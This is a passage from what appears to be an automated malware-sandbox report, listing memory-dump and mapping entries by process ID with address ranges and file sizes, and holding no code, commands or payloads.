            • memory/1948-64-0x00000000057A0000-0x00000000057A1000-memory.dmp
              Filesize

              4KB

            • memory/1948-77-0x0000000006390000-0x0000000006391000-memory.dmp
              Filesize

              4KB

            • memory/1948-69-0x00000000057F0000-0x00000000057F1000-memory.dmp
              Filesize

              4KB

            • memory/1964-16-0x0000000000000000-mapping.dmp
            • memory/1980-270-0x000000000041A684-mapping.dmp
            • memory/1980-269-0x0000000000400000-0x0000000000420000-memory.dmp
              Filesize

              128KB

            • memory/1980-272-0x0000000000400000-0x0000000000420000-memory.dmp
              Filesize

              128KB

            • memory/2008-307-0x0000000000000000-mapping.dmp
            • memory/2220-216-0x0000000000400000-0x0000000000493000-memory.dmp
              Filesize

              588KB

            • memory/2220-217-0x000000000043FCC3-mapping.dmp
            • memory/2220-219-0x0000000000400000-0x0000000000493000-memory.dmp
              Filesize

              588KB

            • memory/2292-238-0x000000000043FCC3-mapping.dmp
            • memory/2300-252-0x0000000000000000-mapping.dmp
            • memory/2300-266-0x0000000000410000-0x0000000000434000-memory.dmp
              Filesize

              144KB

            • memory/2300-258-0x0000000000400000-0x0000000000401000-memory.dmp
              Filesize

              4KB

            • memory/2300-256-0x0000000000C10000-0x0000000000C11000-memory.dmp
              Filesize

              4KB

            • memory/2300-255-0x0000000073580000-0x0000000073C6E000-memory.dmp
              Filesize

              6.9MB

            • memory/2332-334-0x0000000000780000-0x00000000007A4000-memory.dmp
              Filesize

              144KB

            • memory/2332-282-0x0000000000000000-mapping.dmp
            • memory/2332-332-0x00000000006F0000-0x0000000000713000-memory.dmp
              Filesize

              140KB

            • memory/2332-285-0x0000000073030000-0x000000007371E000-memory.dmp
              Filesize

              6.9MB

            • memory/2332-286-0x0000000000D80000-0x0000000000D81000-memory.dmp
              Filesize

              4KB

            • memory/2428-317-0x0000000001010000-0x0000000001011000-memory.dmp
              Filesize

              4KB

            • memory/2428-318-0x0000000004A50000-0x0000000004A51000-memory.dmp
              Filesize

              4KB

            • memory/2428-319-0x00000000047C0000-0x00000000047C1000-memory.dmp
              Filesize

              4KB

            • memory/2428-320-0x0000000005420000-0x0000000005421000-memory.dmp
              Filesize

              4KB

            • memory/2428-316-0x0000000073030000-0x000000007371E000-memory.dmp
              Filesize

              6.9MB

            • memory/2428-314-0x0000000000000000-mapping.dmp
            • memory/2452-292-0x0000000000000000-mapping.dmp
            • memory/2452-326-0x00000000004C0000-0x00000000004C5000-memory.dmp
              Filesize

              20KB

            • memory/2452-295-0x0000000073030000-0x000000007371E000-memory.dmp
              Filesize

              6.9MB

            • memory/2452-310-0x0000000000280000-0x0000000000292000-memory.dmp
              Filesize

              72KB

            • memory/2452-308-0x0000000000230000-0x0000000000231000-memory.dmp
              Filesize

              4KB

            • memory/2452-302-0x0000000000A80000-0x0000000000A81000-memory.dmp
              Filesize

              4KB

            • memory/2492-390-0x0000000000000000-mapping.dmp
            • memory/2492-418-0x0000000000000000-mapping.dmp
            • memory/2492-570-0x0000000000000000-mapping.dmp
            • memory/2492-566-0x0000000000000000-mapping.dmp
            • memory/2492-568-0x0000000000000000-mapping.dmp
            • memory/2492-564-0x0000000000000000-mapping.dmp
            • memory/2492-562-0x0000000000000000-mapping.dmp
            • memory/2492-560-0x0000000000000000-mapping.dmp
            • memory/2492-558-0x0000000000000000-mapping.dmp
            • memory/2492-556-0x0000000000000000-mapping.dmp
            • memory/2492-554-0x0000000000000000-mapping.dmp
            • memory/2492-552-0x0000000000000000-mapping.dmp
            • memory/2492-550-0x0000000000000000-mapping.dmp
            • memory/2492-548-0x0000000000000000-mapping.dmp
            • memory/2492-546-0x0000000000000000-mapping.dmp
            • memory/2492-544-0x0000000000000000-mapping.dmp
            • memory/2492-542-0x0000000000000000-mapping.dmp
            • memory/2492-540-0x0000000000000000-mapping.dmp
            • memory/2492-538-0x0000000000000000-mapping.dmp
            • memory/2492-536-0x0000000000000000-mapping.dmp
            • memory/2492-534-0x0000000000000000-mapping.dmp
            • memory/2492-532-0x0000000000000000-mapping.dmp
            • memory/2492-530-0x0000000000000000-mapping.dmp
            • memory/2492-528-0x0000000000000000-mapping.dmp
            • memory/2492-526-0x0000000000000000-mapping.dmp
            • memory/2492-524-0x0000000000000000-mapping.dmp
            • memory/2492-522-0x0000000000000000-mapping.dmp
            • memory/2492-520-0x0000000000000000-mapping.dmp
            • memory/2492-518-0x0000000000000000-mapping.dmp
            • memory/2492-516-0x0000000000000000-mapping.dmp
            • memory/2492-514-0x0000000000000000-mapping.dmp
            • memory/2492-512-0x0000000000000000-mapping.dmp
            • memory/2492-510-0x0000000000000000-mapping.dmp
            • memory/2492-508-0x0000000000000000-mapping.dmp
            • memory/2492-506-0x0000000000000000-mapping.dmp
            • memory/2492-504-0x0000000000000000-mapping.dmp
            • memory/2492-343-0x00000000000A0000-0x00000000000A1000-memory.dmp
              Filesize

              4KB

            • memory/2492-344-0x0000000000000000-mapping.dmp
            • memory/2492-345-0x00000000000E0000-0x00000000000E1000-memory.dmp
              Filesize

              4KB

            • memory/2492-346-0x0000000000000000-mapping.dmp
            • memory/2492-348-0x0000000000000000-mapping.dmp
            • memory/2492-350-0x0000000000000000-mapping.dmp
            • memory/2492-352-0x0000000000000000-mapping.dmp
            • memory/2492-354-0x0000000000000000-mapping.dmp
            • memory/2492-356-0x0000000000000000-mapping.dmp
            • memory/2492-358-0x0000000000000000-mapping.dmp
            • memory/2492-360-0x0000000000000000-mapping.dmp
            • memory/2492-362-0x0000000000000000-mapping.dmp
            • memory/2492-364-0x0000000000000000-mapping.dmp
            • memory/2492-366-0x0000000000000000-mapping.dmp
            • memory/2492-368-0x0000000000000000-mapping.dmp
            • memory/2492-370-0x0000000000000000-mapping.dmp
            • memory/2492-372-0x0000000000000000-mapping.dmp
            • memory/2492-374-0x0000000000000000-mapping.dmp
            • memory/2492-376-0x0000000000000000-mapping.dmp
            • memory/2492-378-0x0000000000000000-mapping.dmp
            • memory/2492-380-0x0000000000000000-mapping.dmp
            • memory/2492-382-0x0000000000000000-mapping.dmp
            • memory/2492-384-0x0000000000000000-mapping.dmp
            • memory/2492-386-0x0000000000000000-mapping.dmp
            • memory/2492-388-0x0000000000000000-mapping.dmp
            • memory/2492-502-0x0000000000000000-mapping.dmp
            • memory/2492-392-0x0000000000000000-mapping.dmp
            • memory/2492-394-0x0000000000000000-mapping.dmp
            • memory/2492-396-0x0000000000000000-mapping.dmp
            • memory/2492-398-0x0000000000000000-mapping.dmp
            • memory/2492-400-0x0000000000000000-mapping.dmp
            • memory/2492-402-0x0000000000000000-mapping.dmp
            • memory/2492-404-0x0000000000000000-mapping.dmp
            • memory/2492-406-0x0000000000000000-mapping.dmp
            • memory/2492-408-0x0000000000000000-mapping.dmp
            • memory/2492-410-0x0000000000000000-mapping.dmp
            • memory/2492-412-0x0000000000000000-mapping.dmp
            • memory/2492-414-0x0000000000000000-mapping.dmp
            • memory/2492-416-0x0000000000000000-mapping.dmp
            • memory/2492-500-0x0000000000000000-mapping.dmp
            • memory/2492-420-0x0000000000000000-mapping.dmp
            • memory/2492-422-0x0000000000000000-mapping.dmp
            • memory/2492-424-0x0000000000000000-mapping.dmp
            • memory/2492-426-0x0000000000000000-mapping.dmp
            • memory/2492-428-0x0000000000000000-mapping.dmp
            • memory/2492-430-0x0000000000000000-mapping.dmp
            • memory/2492-432-0x0000000000000000-mapping.dmp
            • memory/2492-434-0x0000000000000000-mapping.dmp
            • memory/2492-436-0x0000000000000000-mapping.dmp
            • memory/2492-438-0x0000000000000000-mapping.dmp
            • memory/2492-440-0x0000000000000000-mapping.dmp
            • memory/2492-442-0x0000000000000000-mapping.dmp
            • memory/2492-444-0x0000000000000000-mapping.dmp
            • memory/2492-446-0x0000000000000000-mapping.dmp
            • memory/2492-448-0x0000000000000000-mapping.dmp
            • memory/2492-450-0x0000000000000000-mapping.dmp
            • memory/2492-452-0x0000000000000000-mapping.dmp
            • memory/2492-454-0x0000000000000000-mapping.dmp
            • memory/2492-456-0x0000000000000000-mapping.dmp
            • memory/2492-458-0x0000000000000000-mapping.dmp
            • memory/2492-460-0x0000000000000000-mapping.dmp
            • memory/2492-462-0x0000000000000000-mapping.dmp
            • memory/2492-464-0x0000000000000000-mapping.dmp
            • memory/2492-466-0x0000000000000000-mapping.dmp
            • memory/2492-468-0x0000000000000000-mapping.dmp
            • memory/2492-470-0x0000000000000000-mapping.dmp
            • memory/2492-472-0x0000000000000000-mapping.dmp
            • memory/2492-474-0x0000000000000000-mapping.dmp
            • memory/2492-476-0x0000000000000000-mapping.dmp
            • memory/2492-478-0x0000000000000000-mapping.dmp
            • memory/2492-480-0x0000000000000000-mapping.dmp
            • memory/2492-482-0x0000000000000000-mapping.dmp
            • memory/2492-484-0x0000000000000000-mapping.dmp
            • memory/2492-486-0x0000000000000000-mapping.dmp
            • memory/2492-488-0x0000000000000000-mapping.dmp
            • memory/2492-490-0x0000000000000000-mapping.dmp
            • memory/2492-492-0x0000000000000000-mapping.dmp
            • memory/2492-494-0x0000000000000000-mapping.dmp
            • memory/2492-496-0x0000000000000000-mapping.dmp
            • memory/2492-498-0x0000000000000000-mapping.dmp
            • memory/2504-299-0x0000000000000000-mapping.dmp
            • memory/2560-104-0x0000000000000000-mapping.dmp
            • memory/2572-330-0x0000000000000000-mapping.dmp
            • memory/2596-135-0x000007FEF8010000-0x000007FEF828A000-memory.dmp
              Filesize

              2.5MB

            • memory/2620-230-0x0000000000000000-mapping.dmp
            • memory/2620-110-0x0000000000000000-mapping.dmp
            • memory/2664-114-0x0000000000000000-mapping.dmp
            • memory/2704-226-0x0000000000F60000-0x0000000000F61000-memory.dmp
              Filesize

              4KB

            • memory/2704-228-0x00000000004D0000-0x00000000004D1000-memory.dmp
              Filesize

              4KB

            • memory/2704-225-0x0000000071590000-0x0000000071C7E000-memory.dmp
              Filesize

              6.9MB

            • memory/2704-241-0x0000000000AB0000-0x0000000000B01000-memory.dmp
              Filesize

              324KB

            • memory/2704-222-0x0000000000000000-mapping.dmp
            • memory/2712-130-0x0000000000400000-0x0000000000498000-memory.dmp
              Filesize

              608KB

            • memory/2712-122-0x000000000043FCC3-mapping.dmp
            • memory/2712-121-0x0000000000400000-0x0000000000498000-memory.dmp
              Filesize

              608KB

            • memory/2732-126-0x000000000041A684-mapping.dmp
            • memory/2732-125-0x0000000000400000-0x0000000000425000-memory.dmp
              Filesize

              148KB

            • memory/2732-128-0x0000000000400000-0x0000000000425000-memory.dmp
              Filesize

              148KB

            • memory/2764-137-0x0000000000400000-0x0000000000439000-memory.dmp
              Filesize

              228KB

            • memory/2764-134-0x0000000000417A8B-mapping.dmp
            • memory/2764-133-0x0000000000400000-0x0000000000439000-memory.dmp
              Filesize

              228KB

            • memory/2900-336-0x0000000073030000-0x000000007371E000-memory.dmp
              Filesize

              6.9MB

            • memory/2900-337-0x0000000001090000-0x0000000001091000-memory.dmp
              Filesize

              4KB

            • memory/2900-338-0x0000000004A50000-0x0000000004A51000-memory.dmp
              Filesize

              4KB

            • memory/2900-339-0x0000000004960000-0x0000000004961000-memory.dmp
              Filesize

              4KB

            • memory/2900-340-0x0000000005400000-0x0000000005401000-memory.dmp
              Filesize

              4KB

            • memory/2900-333-0x0000000000000000-mapping.dmp
            • memory/2932-231-0x0000000000000000-mapping.dmp
            • memory/2960-149-0x00000000000D0000-0x00000000000D1000-memory.dmp
              Filesize

              4KB

            • memory/2960-205-0x0000000004800000-0x00000000048B0000-memory.dmp
              Filesize

              704KB

            • memory/2960-208-0x0000000002120000-0x000000000212D000-memory.dmp
              Filesize

              52KB

            • memory/2960-145-0x0000000000000000-mapping.dmp
            • memory/2960-148-0x0000000071590000-0x0000000071C7E000-memory.dmp
              Filesize

              6.9MB

            • memory/2988-264-0x0000000000000000-mapping.dmp
            • memory/3040-156-0x0000000071590000-0x0000000071C7E000-memory.dmp
              Filesize

              6.9MB

            • memory/3040-153-0x0000000000000000-mapping.dmp